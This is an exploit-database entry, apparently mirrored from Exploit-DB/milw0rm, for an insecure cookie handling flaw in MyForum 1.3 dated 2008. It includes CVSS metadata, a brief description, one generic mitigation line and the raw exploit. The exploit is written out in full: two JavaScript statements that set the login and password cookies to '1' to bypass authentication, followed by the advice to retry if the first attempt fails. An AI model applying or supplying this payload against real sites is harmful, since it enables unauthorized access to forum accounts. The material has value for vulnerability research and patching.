header-logo
Suggest Exploit
vendor:
MyForum
by:
Mountassif Moad
7.5
CVSS
HIGH
Insecure Cookie Handling
384
CWE
Product Name: MyForum
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MyForum 1.3 Insecure Cookie Handling Vulnerability

A vulnerability exists in MyForum 1.3 which allows an attacker to set a cookie with the name 'myforum_login' and value '1' and another cookie with the name 'myforum_pass' and value '1' by using the JavaScript code 'javascript:document.cookie = "myforum_login=1; path=/"; javascript:document.cookie = "myforum_pass=1; path=/";'

Mitigation:

Ensure that cookies are properly validated and sanitized before being used.
Source

Exploit-DB raw data:

###############################################################################################
[+] MyForum 1.3 Insecure Cookie Handling Vulnerability
[+] Discovered By : Mountassif Moad          
[+] Greetz : All my freind          
################################################################################################
Exploit:
javascript:document.cookie = "myforum_login=1; path=/";

javascript:document.cookie = "myforum_pass=1; path=/";
 
desc: if it dont work in the first test try another test 

# milw0rm.com [2008-10-28]